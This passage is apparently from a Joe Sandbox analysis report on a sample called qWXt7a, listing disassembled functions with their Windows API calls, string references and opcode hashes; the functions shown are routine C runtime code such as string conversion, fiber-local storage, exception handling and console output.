Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFE13204CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13204E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1320519B

Strings

csm, xrefs: 00007FFE13204DB9
csm, xrefs: 00007FFE13204E99
csm, xrefs: 00007FFE13204E1B

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 7ee3fd7e733d4e74fec9409c955775a149389a7590508d8a8ab1853f49e5f17f
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: DDE1B572908B818EE710AF26D4803BD77A0FBA5B68F144175DB9D67666CF38E489C740

Function 00007FFE132095BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE132095CB
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE13209601
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320962E
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320963F
FlsSetValue.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE13209650
SetLastError.KERNEL32(?,?,?,00007FFE13208BC9,?,?,?,?,00007FFE13208C14), ref: 00007FFE1320966B

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 864a79f61816f30d9f744385e111a96ec7447dcc6a65e85cacf4777a2a4f9cec
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: ED114A20B0CE428EFA64B763569113E65529FE8BB0F4447B5E93F366F6DE6CE449C200

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFE13207F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFE13207F4D
GetProcAddress.KERNEL32 ref: 00007FFE13207F63
FreeLibrary.KERNEL32 ref: 00007FFE13207F8A

Strings

mscoree.dll, xrefs: 00007FFE13207F44
CorExitProcess, xrefs: 00007FFE13207F5C

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: ebba7c17654feb8c5a842861a7653ecb2dfffcc07ba7b36a94c37c568f59e85f
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 5FF0C261B18F0689EB10AB26E4443396320AFE9B70F540375DA6D566F5CF2CD049C300

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFE132040D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFE132041F7
__AdjustPointer.LIBCMT ref: 00007FFE13204242

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 6f6fa632d4a09f0b22d7ea56d52526b5440f7cdd38b60465b1c6fa3688516bc7
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: 5BB1A021A0AE428DEA65FB53944023D66A0AFF4BA4F19C4B5DE4C377A5DE3CE449CB40

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFE1320FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFE1320FB7C
_set_statfp.LIBCMT ref: 00007FFE1320FB97
_set_statfp.LIBCMT ref: 00007FFE1320FBB3
_set_statfp.LIBCMT ref: 00007FFE1320FBEF

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 458284781289daed9fbb34b7da86bed918a30e164b14b60c8f36c042b95b029a
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 73110433E98E4B29F354312AE12673C10006FFC3B0F1442B0E5AE262FE9E2CA84CC900

Function 00007FFE13209684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096A3
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096C2
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096EA
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE132096FB
FlsSetValue.KERNEL32(?,?,?,00007FFE1320766F,?,?,00000000,00007FFE1320790A,?,?,?,?,?,00007FFE13207896), ref: 00007FFE1320970C

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 63c60781ad130f443e14a1b6891a47bc712a2bef4e56b06d447b90016bf4ac51
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: 29116A61B0CA424DFA68BB27A65117D65929FE47F0F5443B4E83F366F6EE2CE449C200

Function 00007FFE13209518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFE13209529
FlsSetValue.KERNEL32 ref: 00007FFE13209548
FlsSetValue.KERNEL32 ref: 00007FFE13209570
FlsSetValue.KERNEL32 ref: 00007FFE13209581
FlsSetValue.KERNEL32 ref: 00007FFE13209592

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 6c10db60c7baa1ec6f11d5a73051852661f67296fe9ca5fc5aba5ac45ae8fa40
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 6211D650B0DA464EFAA8B6A3545217D59918FE4770E5407B4D93F3A2F3ED2CB449C610

Function 00007FFE13205448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE132054B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13205503

Strings

MOC, xrefs: 00007FFE132054CC
RCC, xrefs: 00007FFE132054D4

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: 8951c0f60ec2cf77faaf2b17432a2aff8c3767b91d5969cd6be4098219279403
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 1B91A173A08B85CEE710EB66D4402AD7BA0FB94798F24417AEB4D27765DF38D199CB00

Function 00007FFE13203A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13203A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE13203AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE13203B54

Strings

csm, xrefs: 00007FFE13203AE1

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: d07186214d5f82e317c32afe8ae9b6b92203a5ad53b6d089979b0dd3d82a8a51
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 5C51C332B19A428EDB14EB1BD44463E7391EBA4BA8F108171DB4E537A9DF7DE845C700

Function 00007FFE132059C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE132059F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13205AD8

Strings

csm, xrefs: 00007FFE13205A12
csm, xrefs: 00007FFE13205B2A

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: af04bb4df9dff6b50d74e5e412080b2ea54cde7e5d77434e64863f510f254d93
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: A751903290CB82CEEB64AB12948436C77A0EBA4BA4F244175DA4D67BA5CF3CF458C700

Function 00007FFE132051D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE13205237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13205283

Strings

MOC, xrefs: 00007FFE1320524B
RCC, xrefs: 00007FFE13205253

Memory Dump Source

